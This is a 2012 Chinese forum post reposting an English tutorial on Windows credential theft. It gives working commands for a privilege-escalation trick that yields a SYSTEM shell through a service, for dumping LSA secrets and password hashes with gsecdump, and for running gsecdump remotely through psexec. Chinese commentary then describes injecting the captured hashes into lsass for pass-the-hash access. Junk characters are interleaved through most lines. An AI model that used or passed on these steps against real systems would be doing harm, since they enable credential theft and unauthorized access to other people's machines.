找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2417|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:- c) g- J$ O5 ?/ ?
/ w9 S! u0 e/ h  `' D
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact2 n, `2 O/ s" s1 M) D" X
[SC] CreateService SUCCESS$ \* J& {$ |7 V( s) K* W# W* r2 P

& ]- ]! q% W( x' B) D" Z# SC:\>sc start shellcmdline4 ~& y- T; ?% e; v7 B
[SC] StartService FAILED 1053:
7 H( m8 ^# J& O  x3 X, A! ~* ~; u9 J4 R
The service did not respond to the start or control request in a timely fashion.
- i( u  w. n% m" E0 j& O& r/ d$ k4 z- w( H0 N1 m! V' G8 U
C:\>sc delete shellcmdline
% H  F8 d/ g6 F$ j8 \[SC] DeleteService SUCCESS: w' l' Y# n/ |  }& {6 o0 F7 x

" e9 _. {: a' E" y------------. f( w7 k# O0 ^! z. e4 f2 u

" N. ], r0 Z6 u/ K) l+ oThen in the new DOS window:( H- U! g# P& V: S( A$ V

! W- J( `. a' a1 G0 _5 o' j& ~, \, ^' pMicrosoft Windows XP [Version 5.1.2600]
4 F# L- h2 h) K(C) Copyright 1985-2001 Microsoft Corp.) m3 s# N# H3 o2 u! c" }/ H
, a# v# j5 e7 ~' N
C:\WINDOWS\system32>whoami. A* }& ?/ }, e/ e6 d% E: I& n
NT AUTHORITY\SYSTEM
+ B. g4 D8 B, d0 g! S" v% j) e# c
9 ]7 ]& ?: h: X) d: Q# bC:\WINDOWS\system32>gsecdump -h+ N4 {4 F. i' ^. C/ l7 j; I
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
& c7 L1 Z7 C& nusage: gsecdump [options]2 d: @/ _" T) N2 M. R2 f7 \
; P0 |' Z+ T' J/ S
options:
: Y( Z) D( Z+ d6 g0 Y-h [ --help ] show help
( s- Z) i& v; L; q-a [ --dump_all ] dump all secrets
0 e# G6 S. s+ M7 N-l [ --dump_lsa ] dump lsa secrets9 |6 B* r! n) {: I" D- ]7 S
-w [ --dump_wireless ] dump microsoft wireless connections/ W( N/ \% z1 @: D: u" t- k0 N& z3 h
-u [ --dump_usedhashes ] dump hashes from active logon sessions
) ?# g) N1 W% n: h4 J-s [ --dump_hashes ] dump hashes from SAM/AD
: o% Z  f- W& n- I" P: o' a7 P
& U& N; \7 v6 f: o8 x' h0 v  T. TAlthough I like to use:
& P% m* Q; u6 l' p/ j  }8 j
1 m  J9 s* b2 g: L* yPsExec v1.83 - Execute processes remotely' `2 B' c7 H3 z9 G5 L0 U$ j
Copyright (C) 2001-2007 Mark Russinovich7 C# @0 U3 L1 G) m
Sysinternals - 链接标记[url]www.sysinternals.com[/url]2 P" ]/ T, C/ B* e
2 {9 ]3 P" {$ r
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT. m& ^7 n% \0 y

9 C/ b+ o$ U8 ~1 `' [* Wto get the hashes from active logon sessions of a remote system.$ R$ b9 |8 a, k1 Q# A' `, ?- L
. ^/ N& J8 V4 R; `0 z: s
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.) c, j* i7 m/ x# r( W7 p+ U, S$ Y

% p* q! F- F9 W6 e6 D提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
5 ^. i; m- c# p# R2 G. T2 q: a原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]* D4 H- X0 ^  T) s7 ^/ F8 u7 h
5 h/ a( o7 B6 R) t
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
# [1 p/ |* k  h" R. C# R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表